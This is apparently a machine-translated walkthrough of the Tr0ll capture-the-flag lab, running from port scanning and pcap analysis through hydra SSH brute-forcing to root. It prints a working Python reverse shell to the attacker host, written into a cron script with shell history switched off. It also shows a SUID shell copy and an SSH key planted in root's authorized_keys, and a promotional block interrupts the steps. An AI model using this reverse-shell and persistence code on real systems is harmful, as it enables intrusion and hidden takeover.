foreword
This time, the Tr0ll classic project is used as the shooting range to simulate the Internet environment and demonstrate the whole process from information collection to final privilege escalation. The techniques involved in this experiment include a series of basic operations such as port scanning, traffic analysis, file analysis, hydra blasting, various rebound shells, stable shells, scheduled task rebound shells (privilege escalation), and public and private key interactions, which are suitable for entry. Beginner practice soon.
Attack aircraft: 192.168.160.3
Victim machine: 192.168.160.7
1. Information collection
1. Full port scan
nmap -p- 192.168.160.7
Found open ports 21, 22, 80
2, nmap detailed scan
nmap -sS -sV -A -T5 192.168.160.7
Found that there is a default password Anonymous in ftp
3. Log in to ftp
Use the default account password Anonymous/Anonymous to log in to ftp
ftp 192.168.160.7
dir查看
get下载
put上传
Found lol.pcap traffic packets
[→Follow me for all resources, and reply to "data" by private message to get ←]
1. Network security learning route
2. E-books (white hat)
3. Internal video of a big security company4,
100 src documents5
, common security interview questions6
, Analysis of the classic topics of the ctf competition
7, a full set of toolkits
8, emergency response notes
4. Analyze traffic packets
Analyze traffic with wireshark
wireshark lol.pcap
Right click to trace tcp stream
get info secret_stuff.txt
Trace the second tcp stream and get the information sup3rs3cr3tdirlol
After investigation, sup3rs3cr3tdirlol is a directory with a roflmao file in it
5. Analyze the file
Download the file and find it to be a 32-bit file after analysis
file roflmao
Analyze file information
exiftool roflmao
binwalk roflmao
strings roflmao
Get information: 0x0856BF
It is found that there is information in the 0x0856BF directory, and the information is made into a password book zhi.txt
There's nothing in Pass.txt, the filename might be useful
2. Violent cracking
1. Hydra blasting
Use hydra blasting, use the one just collected as the account book, and the file name Pass.txt as the password field for ssh blasting
hydra -L zhi.txt -p Pass.txt 192.168.160.7 ssh
Get account password: overflow, Pass.txt
2. Log in to ssh
ssh [email protected]
稳定shell
python -c 'import pty;pty.spawn("/bin/bash")'
3. Elevation of rights
1. Check the system version
uname -a
Found to be Linux ubuntu 3.13.0
2. Search for privilege escalation exp
searchsploit Linux ubuntu 3.13.0
复制到桌面
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/Desktop/
3. View exp
gedit 37292.c
There is a tutorial in exp
python open http service, remote download
python -m http.server 8520
wget http://192.168.160.3/37292.c
4. Expansion
After the privilege escalation, it is found that the shell will be disconnected after a few minutes. It should be a scheduled task.
1. View scheduled tasks
find / -name cronlog 2>/dev/null ---查看计划任务日志信息
find / -name cleaner.py 2>/dev/null ---查看文件在哪儿
It is found that the scheduled task is set to delete files in the tmp directory every 5 minutes, and there is no permission for the scheduled task
1. Rebound shell
Enumerate all writable and modifiable files
find / -writable 2>/dev/null ---枚举所有可写入权限的文件
find / -perm -o+w -type f 2> /dev/null | grep /proc -v ---枚举
Modify the scheduled task file cleaner.py
nano /lib/log/cleaner.py
ctrl+x退出,y保存
change into
#!/usr/bin/python
def con():
import socket, time,pty, os
host='192.168.160.3'
port=2233
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(10)
s.connect((host,port))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()
con()
nc -lvvp 2233
Successfully restored root privileges
2. Create a root executable program
Modify scheduled tasks
os.system('cp /bin/sh /tmp/zhi')
os.system('chmod u+s /tmp/zhi')
3. Write ssh rsa
generate ssh key
ssh-keygen ---一路空格回车
cat id_rsa.pub
ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABgQCeLZfgzSuFUU8hGMMQkqPEho/ikzjqvPQDKpSTXuCalQJNohE5HpFWf/3IaAiNSyXCKB/Fus81X7WL9l6+sBMkkB5DRtbDh8OapsavE6LWNDs0nJJmS3JtE6jmJAkuP/9EuPreUFIwTDw43B1dhSMNygwogAmno2zJ323prOskCkTZOtpxvhwXNjmnhI3FXlkLOReVVZc3sWvm1PUkN8/gZN9WqjVNq9J8Gl7QexU++Jrt7MbWMhx9y8qAQXNVwqohxSW+poQeBDWdyG8= root@kali
Scheduled task write key
mkdir /root/.ssh; chmod 775 .ssh; echo "加上 id_rsa.pub产生的密匙内容上图有例子" >> /root/.ssh/authorized_keys
即
mkdir /root/.ssh; chmod 775 .ssh; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCeLZfgzSuFUU8hGMMQkqPEho/ikzjqvPQDKpSTXuCalQJNohE5HpFWf/3IaAii7r0BvJGXQ6Wk/eIrX8IxsCU23jmnigWlQkxwabscxGXs/Ng0a9vLyseI5+PuY9x881NMoi1YIJAoqBnNSyXCKB/Fus81X7WL9l6+sBMkkB5DRtbDh8OapsavE6LWNDs0nJJmS3JtE6jmJAkuP/9EuPreUFIwTDw43B1dhSMNygwogAmno2MKhvaFoSmHzxBX+TG4/FM3jYQrF8A6LTCWSQlo7bChcCvLpDOy7LBqLQy0U+pjLcH/xv105MVqxNpG+szJ323prOskCkTZOtpxvhwXNjmnhI3FXlkLOReVVZc3sWvm1PUkN8/gZN9WqjVNq9J8Gl7QexU++Jrt7MbWMhx9y8qAQXNVwqohxtCQ+qstFm6KzlXei1Yd6vIQLDWyS67rnWGt0caKEBkIengjEwfb5zoImkQFxKYpapqBbH+oGAuzDQk6jSW+poQeBDWdyG8= root@kali" >> /root/.ssh/authorized_keys
The public and private keys are mutually collided without entering a password
ssh [email protected]